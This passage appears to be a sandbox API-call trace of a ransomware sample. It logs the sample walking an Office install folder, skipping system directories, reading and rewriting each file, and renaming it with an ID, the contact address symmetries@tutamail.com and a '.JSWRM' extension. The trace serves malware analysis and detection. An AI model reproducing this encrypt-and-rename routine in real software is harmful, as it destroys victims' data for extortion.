hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0121.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0121.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeVisio.nrr", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeVisio.nrr", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeVisio.nrr", lpUsedDefaultChar=0x0) returned 15 [0121.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0121.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0121.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0121.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0121.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeVisio.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmevisio.nrr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.979] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=215772) returned 1 [0121.979] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0121.979] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0121.990] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.990] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0121.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.990] CloseHandle (hObject=0x238) returned 1 [0121.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0121.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0121.991] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0121.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.991] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0121.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0121.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0121.991] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0121.991] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0121.991] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeVisio.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmevisio.nrr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeVisio.nrr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmevisio.nrr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0121.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0121.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0121.992] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaf2ed8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaf2ed8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5fa74, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TellMeWord.nrr", cAlternateFileName="TEC8DE~1.NRR")) returned 1 [0121.992] lstrcmpiW (lpString1="TellMeWord.nrr", lpString2=".") returned 1 [0121.992] lstrcmpiW (lpString1="TellMeWord.nrr", lpString2="..") returned 1 [0121.992] lstrcmpiW (lpString1="TellMeWord.nrr", lpString2="...") returned 1 [0121.992] lstrcmpiW (lpString1="TellMeWord.nrr", lpString2="windows") returned -1 [0121.992] lstrcmpiW (lpString1="TellMeWord.nrr", lpString2="recovery") returned 1 [0121.992] lstrcmpiW (lpString1="TellMeWord.nrr", lpString2="perflogs") returned 1 [0121.992] lstrcmpiW (lpString1="TellMeWord.nrr", lpString2="documents and settings") returned 1 [0121.992] lstrcmpiW (lpString1="TellMeWord.nrr", lpString2="$RECYCLE.BIN") returned 1 [0121.992] lstrcmpiW (lpString1="TellMeWord.nrr", lpString2="system volume information") returned 1 [0121.992] lstrcmpiW (lpString1="TellMeWord.nrr", lpString2="msocache") returned 1 [0121.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0121.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeWord.nrr", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0121.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeWord.nrr", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeWord.nrr", lpUsedDefaultChar=0x0) returned 14 [0121.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0121.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0121.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeWord.nrr", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0121.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeWord.nrr", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeWord.nrr", lpUsedDefaultChar=0x0) returned 14 [0121.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0121.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0121.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0121.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0121.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeWord.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeword.nrr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.994] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=391796) returned 1 [0121.994] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0121.994] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0122.007] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.007] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0122.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.007] CloseHandle (hObject=0x238) returned 1 [0122.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0122.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0122.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0122.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0122.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0122.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0122.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0122.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0122.008] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeWord.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeword.nrr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeWord.nrr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeword.nrr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0122.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0122.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0122.009] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x47e33aa, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x47e33aa, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x47e33aa, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TERRCOTT.CSS", cAlternateFileName="")) returned 1 [0122.009] lstrcmpiW (lpString1="TERRCOTT.CSS", lpString2=".") returned 1 [0122.009] lstrcmpiW (lpString1="TERRCOTT.CSS", lpString2="..") returned 1 [0122.009] lstrcmpiW (lpString1="TERRCOTT.CSS", lpString2="...") returned 1 [0122.009] lstrcmpiW (lpString1="TERRCOTT.CSS", lpString2="windows") returned -1 [0122.009] lstrcmpiW (lpString1="TERRCOTT.CSS", lpString2="recovery") returned 1 [0122.009] lstrcmpiW (lpString1="TERRCOTT.CSS", lpString2="perflogs") returned 1 [0122.009] lstrcmpiW (lpString1="TERRCOTT.CSS", lpString2="documents and settings") returned 1 [0122.009] lstrcmpiW (lpString1="TERRCOTT.CSS", lpString2="$RECYCLE.BIN") returned 1 [0122.009] lstrcmpiW (lpString1="TERRCOTT.CSS", lpString2="system volume information") returned 1 [0122.009] lstrcmpiW (lpString1="TERRCOTT.CSS", lpString2="msocache") returned 1 [0122.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0122.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TERRCOTT.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TERRCOTT.CSS", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TERRCOTT.CSS", lpUsedDefaultChar=0x0) returned 12 [0122.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0122.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0122.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TERRCOTT.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TERRCOTT.CSS", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TERRCOTT.CSS", lpUsedDefaultChar=0x0) returned 12 [0122.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0122.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0122.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0122.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0122.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TERRCOTT.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\terrcott.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.010] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0122.011] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0122.011] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0122.104] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.104] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0122.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0122.106] CloseHandle (hObject=0x238) returned 1 [0122.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0122.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0122.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0122.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0122.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0122.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.106] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TERRCOTT.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\terrcott.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TERRCOTT.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\terrcott.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0122.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0122.115] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0xa326fd, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x18ccc9d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x5a850, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TIMESOLN.VSL", cAlternateFileName="")) returned 1 [0122.115] lstrcmpiW (lpString1="TIMESOLN.VSL", lpString2=".") returned 1 [0122.115] lstrcmpiW (lpString1="TIMESOLN.VSL", lpString2="..") returned 1 [0122.115] lstrcmpiW (lpString1="TIMESOLN.VSL", lpString2="...") returned 1 [0122.115] lstrcmpiW (lpString1="TIMESOLN.VSL", lpString2="windows") returned -1 [0122.115] lstrcmpiW (lpString1="TIMESOLN.VSL", lpString2="recovery") returned 1 [0122.115] lstrcmpiW (lpString1="TIMESOLN.VSL", lpString2="perflogs") returned 1 [0122.115] lstrcmpiW (lpString1="TIMESOLN.VSL", lpString2="documents and settings") returned 1 [0122.115] lstrcmpiW (lpString1="TIMESOLN.VSL", lpString2="$RECYCLE.BIN") returned 1 [0122.116] lstrcmpiW (lpString1="TIMESOLN.VSL", lpString2="system volume information") returned 1 [0122.116] lstrcmpiW (lpString1="TIMESOLN.VSL", lpString2="msocache") returned 1 [0122.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TIMESOLN.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TIMESOLN.VSL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TIMESOLN.VSL", lpUsedDefaultChar=0x0) returned 12 [0122.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0122.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TIMESOLN.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TIMESOLN.VSL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TIMESOLN.VSL", lpUsedDefaultChar=0x0) returned 12 [0122.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0122.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0122.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0122.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0122.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 